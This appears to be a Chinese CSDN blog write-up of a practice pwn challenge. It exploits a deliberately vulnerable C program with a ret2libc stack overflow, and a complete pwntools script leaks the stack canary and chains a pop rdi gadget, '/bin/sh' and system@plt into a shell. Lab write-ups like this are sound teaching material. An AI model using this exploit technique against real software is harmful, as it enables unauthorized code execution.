【How2Pwn】Return to Library问题

最新推荐文章于 2024-07-19 15:41:30 发布
最新推荐文章于 2024-07-19 15:41:30 发布
阅读量204 收藏
点赞数
分类专栏: How2Pwn 文章标签: linux 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jeongon/article/details/126586505
版权

0x00 源代码

// Name: rtl.c
// Compile: gcc -o rtl rtl.c -fno-PIE -no-pie
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

const char* binsh = "/bin/sh";
int main() {
  char buf[0x30];
  setvbuf(stdin, 0, _IONBF, 0);
  setvbuf(stdout, 0, _IONBF, 0);
  
  // Add system function to plt's entry
  system("echo 'system@plt'");
  
  // Leak canary
  printf("[1] Leak Canary\n");
  printf("Buf: ");
  read(0, buf, 0x100);
  printf("Buf: %s\n", buf);
  
  // Overwrite return address
  printf("[2] Overwrite return address\n");
  printf("Buf: ");
  read(0, buf, 0x100);
  return 0;
}

问题来源

0x01 代码情况

通过checksec来查看代码情况

$ gcc -o rtl rtl.c -fno-PIE -no-pie
$ checksec rtl
[*] '/home/hhro/dreamhack/rtl'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

这里我们启用了Canary,NX,并且在最新版本的linux下如果没有特殊说明,则ASLR也处于启用的状态。

0x02 弱点分析

1. “/bin/sh”

首先可以看见第五行的代码,这是为了将/bin/sh添加入代码段而编写的代码。需要注意的是就算ASLR启用,PIE没有启用的情况下 代码段和数据段的地址是固定的。

const char* binsh = "/bin/sh";

2. system在PLT

在buf经过初始化之后,我们可以看到一段代码

system("echo 'system@plt'");

这是为了将system函数加入PLT表中,由于PIE没有启用,所以知道库函数的基地址就可以直接调用

3. Buffer Overflow

我们知道,buf的大小为0x30,但是read()可以读入0x100个字符,所以这里可以进行溢出,并且整个程序我们一共可以溢出两次。我们利用第一次溢出来获取canary,第二次来进行Return to Library攻击。

0x03 设计Exploit

1. 绕开Canary

根据上面所分析的内容,我们第一步需要获取Canary的值,用于第二次的攻击。

2. 利用system(“/bin/sh”)获得shell

刚刚我们知道函数的地址都是固定的,所以用gdb就可以得到"/bin/sh"的地址,而plt表中已经保存了system函数的地址,所以很轻松就可以解决这一步。

3. 为什么不使用shellcode

因为这个程序开启了NX,函数的返回地址是随机的。所以就算在buf写入shellcode我们也没办法得到buf的地址,现在我们需要利用Return gadget打断原有函数的流程。

0x04 编写Exploit

1. 获得Canary

对程序进行分析,这里我使用gdb分析发现。buf位于rbp-0x40,canary的值保存在rbp-0x8的位置。所以我们需要向buf里输入0x39个字符。

pwndbg> disass main
Dump of assembler code for function main:
   0x00000000004006f7 <+0>:	push   rbp
   0x00000000004006f8 <+1>:	mov    rbp,rsp
=> 0x00000000004006fb <+4>:	sub    rsp,0x40     //buf在这里
   0x00000000004006ff <+8>:	mov    rax,QWORD PTR fs:0x28
   0x0000000000400708 <+17>:	mov    QWORD PTR [rbp-0x8],rax  //这里是canary
   0x000000000040070c <+21>:	xor    eax,eax
   0x000000000040070e <+23>:	mov    rax,QWORD PTR [rip+0x20095b]        # 0x601070 <stdin@@GLIBC_2.2.5>

Exploit 第一部分

from pwn import *

p = process("./rtl")
e = ELF("./rtl")

def slog(name, addr): 
		return success(": ".join([name, hex(addr)]))
		
# Leak canary
buf = b"A"*0x39
p.sendafter("Buf: ", buf)
p.recvuntil(buf)
cnry = u64(b"\x00"+p.recvn(7))
slog("canary", cnry)

2. 寻找可以利用的gadget

我们利用ROPgadget工具寻找可以利用的ret代码片段。

$ ROPgadget --binary ./rtl --re "pop rdi"
Gadgets information
============================================================
0x0000000000400853 : pop rdi ; ret

Unique gadgets found: 1

3. 打印出"/bin/sh",system函数的地址

利用gdb可以知道/bin/sh被保存在0x400874地址上。

pwndbg> search /bin/sh
rtl             0x400874 0x68732f6e69622f /* '/bin/sh' */
rtl             0x600874 0x68732f6e69622f /* '/bin/sh' */
libc-2.31.so    0x7ffff7f775bd 0x68732f6e69622f /* '/bin/sh' */

刚刚提到system函数已经在plt表中了,所以我们继续打印plt表,看到0x4005d0位置上是system函数。

pwndbg> plt
0x4005b0: puts@plt
0x4005c0: __stack_chk_fail@plt
0x4005d0: system@plt
0x4005e0: printf@plt
0x4005f0: read@plt
0x400600: setvbuf@plt

需要特别注意的点

ripsystem函数中移动时,堆栈必须以0x10的单位进行移动的,这是由于system函数中的movaps命令导致的,它会让堆栈按照0x10的单位排列,若没有则会出现错误。如果写的exploit没有任何问题却发生了Segmentation Fault问题的话,可以在前面写入一个没有任何作用的gadget就可以解决这个问题。16进制下 8(任意gadget) + 8(rdi) = 0x10

0x05 完整的Exploit

from pwn import *

p = process("./rtl")
e = ELF("./rtl")

def slog(name, addr): 
		return success(": ".join([name, hex(addr)]))
		
# Leak canary
buf = b"A"*0x39
p.sendafter("Buf: ", buf)
p.recvuntil(buf)
cnry = u64(b"\x00"+p.recvn(7))
slog("canary", cnry)

# Return to Library
ret = 0x0000000000400285   # 没用的gadget,一般用ret
rdi = 0x0000000000400853   # pop rdi
system = 0x4005d0          # system的地址
binsh = 0x400874           # /bin/sh的地址

payload = b'A'*0x38
payload += p64(cnry)
payload += b'B'*0x8   #sfp
payload += p64(ret)
payload += p64(rdi)
payload += p64(binsh)
payload += p64(system)

p.sendafter("Buf: ", payload)

p.interactive()

0x6 结果

$ python ex_rtl.py
[+] Starting local process './rtl': pid 5673
[*] '/home/workspace/dreamhack/ASLR_NX/rtl/rtl'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
/usr/local/lib/python3.8/dist-packages/pwnlib/tubes/tube.py:812: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[+] canary: 0x2e4534f18484b400
[*] Switching to interactive mode

如果有错误或者不到位的地方,请直接评论或者私信我

头都大了了
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn07.ret2syscall例题
11-11
ret2syscall例题
ret2libc2pwn 入门题
02-11
pwn 入门题
Pwn-10月24-hitcon(二)
weixin_30553837的博客
10-24 167
目录 Pwn-10月24-hitcon(二) lab4 - ret2lib 检查保护措施 逻辑分析 构造exp lab5-simplerop 检查保护措施 逻辑分析 构造exp ...
ret2xx----- Pwn中常见的CTF模板命题
weixin_52321473的博客
04-07 1111
其实 这周末我原本是不想写文章的 主要是放假了 但是 我想往常一样登录了百度站长。。。。 我去!!! 我的文章被索引了!!!! 所以呢 我决定多更新点文章出来 而且最近不是有人说看不懂吗 我觉得更新一些可以让人懂的一些东西 但是今天 我还决定把Ret2讲完 本次教学节选于星梦安全团队在Bilibili上发表的视频 部分转载于https://www.anquanke.com/post/id/205858#h2-2 url为 https://www.bilibili.com/video/BV1Uv411j
pwn学习资料整理——syscall目录
recover517的博客
08-11 840
各种架构下的systemcell指令 x86 (32-bit) x86_64 (64-bit) arm (32-bit/EABI) arm64 (64-bit)
PWN horcruxes [pwnable.kr]CTF writeup题解系列15
重新启程
01-06 815
题目内容: 先连接上去看看题目文件,看起来已经说了是一道rop的题目 root@mypwn:/ctf/work/pwnable.kr# ssh horcruxes@pwnable.kr -p2222 horcruxes@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ ...
Introduction-to-Pwn.pdf
09-09
pwn学习手册 pwn是指在计算机安全领域中,指的是exploit和利用系统漏洞的技术。pwn挑战是一种特殊类型的挑战,旨在测试参与者的技能,以bypass安全机制,exploit系统漏洞,获取系统控制权或获取flag。 pwn挑战的...
入门pwn题目ret2text
03-26
入门pwn题目ret2text
ret2libc1pwn 入门题
02-11
pwn 入门题
Linux中的环境变量
qhy850716的博客
07-17 467
我们思考这样一个问题:指令也是可执行程序,我们写好的编译好的c语言也是程序,为什么我们在执行c语言程序时要./a.out带上当前路径,而ls这种指令就不要带路径呢?这就是环境变量PATH的作用,Linux中存在一些全局设置,表明命令行解释器应该去哪个路径下寻找可执行程序。系统中的很多配置在我们登录Linux时就已经被加载到bash中了,也就是内存。
定制 Linux 内核的意义
地球空间
07-17 301
2. **配置内核**:使用 `make menuconfig` 或 `make xconfig` 配置内核,选择需要支持的硬件和功能。1. **性能优化**:通过定制内核,可以针对特定的硬件或应用场景优化性能,比如减少不必要的驱动支持、优化调度算法等。7. **持续维护**:随着时间的推移,可能需要对内核进行更新和维护,以支持新的硬件和功能。6. **测试和调试**:启动系统,测试新内核的功能和性能,根据需要进行调试和优化。4. **安装内核**:编译完成后,将生成的内核镜像和相关的模块安装到系统中。
Qmi8658a姿态传感器使用心得(2)linux
Starry的博客
07-19 960
COD 原理,CTRL9,自检(详细代码示例)
【Linux杂货铺】期末总结篇4:shell编程
聆风吟的博客
07-17 4284
本文主要分享作者本人期末复习的总结,欢迎大家借鉴浏览。
linux centos nginx 报错 client intended to send too large body: 104853014 bytes问题
qq_42250832的博客
07-17 342
这个错误通常发生在Web服务器处理HTTP请求时,当客户端尝试发送的请求体(body)大小超过了服务器配置的限制时。错误信息 “client intended to send too large body: 104853014 bytes” 表示客户端想要发送的数据量超过了100MB,这通常是由于客户端尝试上传一个非常大的文件或者提交了一个非常大的表单。增加服务器接收请求体的大小限制。这通常可以通过配置文件来实现,例如,如果你使用的是Nginx,可以修改client_max_body_size指令。
Linux 权限
includemainprinf的博客
07-18 637
在Linux操作系统中,权限管理是一个至关重要的概念,它确保了系统的安全性和稳定性。同时可以在工作中,设置对象的权限,就算我们很多人使用一台服务器,我们也可以让别人看不到我们文件的内容,或者让别人无法对自己的文件进行操作!
文件在Linux下为binary格式在Windows下为utf-8格式
qq_38220334的博客
07-17 347
想着是不是之前遇到的问题,有可能是文件中含有特殊字符,然后用vim命令来编辑这个文件,发现,还真是含有一个特殊字符,然后将它删除掉,文件就变成utf-8格式的文件了。在Windows下和Mac下都是没有问题的,在华为云服务器上也是没问题的(操作系统不是centos),但是在自己搭建的Linux服务器(centos)上是有问题的。用shell或者Python脚本去将这个文件转为utf-8格式的,但是都失败了。
Linux 注意事项
最新发布
m0_74012211的博客
07-19 576
Linux 与 Windows 是两个相互独立的操作系统,两者有较大差距
Linux(CentOS7)部署PHP-7.2.17源码包
thetender的博客
07-18 1053
LAMP系统安装 通过PHP的源码包部署PHP-7.2.17版本
ctfshowpwn2
09-28
ctfshowpwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag文件。 2. 使用cat命令打开flag文件,成功拿到flag。 3. 接下来,构造exp,引用中给出了一个使用pwntools库构造的exp示例。其中,使用remote函数连接到pwn.challenge.ctf.show的28025端口。 4. 设置bk变量的值为0x804850f。 5. 构造payload,其中包含了"a"*(0x9 0x4)和p32(bk)。 6. 使用sendline函数发送payload。 7. 使用interactive函数与远程主机进行交互。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值